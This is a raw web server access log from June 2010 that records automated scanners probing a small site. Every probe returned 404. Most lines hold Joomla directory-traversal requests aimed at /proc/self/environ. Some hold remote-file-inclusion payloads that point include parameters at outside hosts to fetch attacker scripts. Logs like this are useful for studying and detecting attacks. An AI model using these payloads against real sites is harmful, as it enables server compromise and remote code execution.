210.0.197.47 - - [09/Jun/2010:19:54:44 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.0.197.47 - - [09/Jun/2010:19:54:44 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
38.101.148.126 - - [09/Jun/2010:19:56:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
69.73.180.30 - - [09/Jun/2010:19:56:18 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.73.180.30 - - [09/Jun/2010:19:56:18 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.14.126.220 - - [09/Jun/2010:19:56:38 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:19:56:38 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
173.208.151.36 - - [09/Jun/2010:19:56:48 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
173.208.151.36 - - [09/Jun/2010:19:56:48 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.73.180.30 - - [09/Jun/2010:19:56:51 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.14.126.220 - - [09/Jun/2010:19:57:20 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
173.208.151.36 - - [09/Jun/2010:19:57:22 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.227.215.115 - - [09/Jun/2010:19:57:27 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
217.73.239.8 - - [09/Jun/2010:19:58:06 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.807"
217.73.239.8 - - [09/Jun/2010:19:58:06 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.807"
217.73.239.8 - - [09/Jun/2010:19:58:06 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [09/Jun/2010:19:58:06 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
216.14.126.220 - - [09/Jun/2010:19:58:21 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:19:58:21 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:19:58:21 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
173.208.151.36 - - [09/Jun/2010:19:58:22 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
173.208.151.36 - - [09/Jun/2010:19:58:22 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.208.151.36 - - [09/Jun/2010:19:58:22 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.227.215.115 - - [09/Jun/2010:19:58:30 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:19:58:30 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:19:58:30 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
60.240.27.86 - - [09/Jun/2010:19:59:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "http://www.google.com.au/search?hl=en&safe=active&q=pconline.com&aq=f&aqi=g6g-s1g1g-s1g1&aql=&oq=&gs_rfai=&fp=c3953b4b2cd7b9db""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
194.50.177.62 - - [09/Jun/2010:20:00:00 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://200.123.169.57/v6id.txt???? HTTP/1.1" 404 350 "-""libwww-perl/5.831"
194.50.177.62 - - [09/Jun/2010:20:00:00 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://200.123.169.57/v6id.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.831"
194.50.177.62 - - [09/Jun/2010:20:00:00 -0500] "GET /logs/access_log.1273363200//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://200.123.169.57/v6id.txt???? HTTP/1.1" 404 372 "-""libwww-perl/5.831"
216.14.126.220 - - [09/Jun/2010:20:02:06 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:20:02:06 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.227.215.115 - - [09/Jun/2010:20:02:06 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:02:06 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
173.208.151.36 - - [09/Jun/2010:20:02:29 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
173.208.151.36 - - [09/Jun/2010:20:02:29 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.14.126.220 - - [09/Jun/2010:20:02:44 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.227.215.115 - - [09/Jun/2010:20:02:48 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
173.208.151.36 - - [09/Jun/2010:20:02:49 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.14.126.220 - - [09/Jun/2010:20:04:00 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:20:04:01 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:20:04:01 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
173.208.151.36 - - [09/Jun/2010:20:04:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
173.208.151.36 - - [09/Jun/2010:20:04:08 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.208.151.36 - - [09/Jun/2010:20:04:08 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.14.126.220 - - [09/Jun/2010:20:04:28 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:20:04:29 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
67.195.112.180 - - [09/Jun/2010:20:04:32 -0500] "GET /logs/access_log.1207526400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.208.151.36 - - [09/Jun/2010:20:04:50 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.208.151.36 - - [09/Jun/2010:20:04:50 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.14.126.220 - - [09/Jun/2010:20:05:45 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:20:05:45 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.14.126.220 - - [09/Jun/2010:20:05:45 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
216.227.215.115 - - [09/Jun/2010:20:05:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:05:51 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:05:51 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:08:52 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:08:52 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
81.93.240.122 - - [09/Jun/2010:20:09:28 -0500] "GET /logs/.php?http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:20:09:28 -0500] "GET /.php?http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 288 "-""libwww-perl/5.805"
216.227.215.115 - - [09/Jun/2010:20:09:53 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:09:53 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:10:25 -0500] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:10:26 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:10:33 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:10:33 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:10:46 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
207.46.13.41 - - [09/Jun/2010:20:11:08 -0500] "GET /logs/access_log.1231286400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.227.215.115 - - [09/Jun/2010:20:11:21 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:22 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:22 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:22 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:33 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:33 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:37 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:38 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:42 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:53 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:11:53 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
81.208.34.38 - - [09/Jun/2010:20:12:05 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.208.34.38 - - [09/Jun/2010:20:12:08 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.208.34.38 - - [09/Jun/2010:20:12:13 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.48.202.44 - - [09/Jun/2010:20:12:27 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [09/Jun/2010:20:13:08 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [09/Jun/2010:20:14:32 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.48.202.44 - - [09/Jun/2010:20:14:33 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [09/Jun/2010:20:14:33 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
82.102.13.117 - - [09/Jun/2010:20:17:03 -0500] "GET //config.myblog.php?get_path=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
82.102.13.117 - - [09/Jun/2010:20:17:03 -0500] "GET //config.myblog.php?get_path=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:32 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:32 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:33 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:37 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:37 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:45 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:45 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:51 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:51 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:52 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:52 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:52 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:52 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:58 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:17:58 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
218.48.202.44 - - [09/Jun/2010:20:18:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.48.202.44 - - [09/Jun/2010:20:18:44 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [09/Jun/2010:20:18:45 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.199.185 - - [09/Jun/2010:20:19:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.227.215.115 - - [09/Jun/2010:20:19:35 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:19:35 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:19:40 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
74.55.65.134 - - [09/Jun/2010:20:19:55 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:19:55 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:19:55 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:19:56 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.227.215.115 - - [09/Jun/2010:20:20:22 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:20:22 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
74.55.65.134 - - [09/Jun/2010:20:20:49 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:20:49 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:21:50 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:21:50 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:21:50 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:21:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
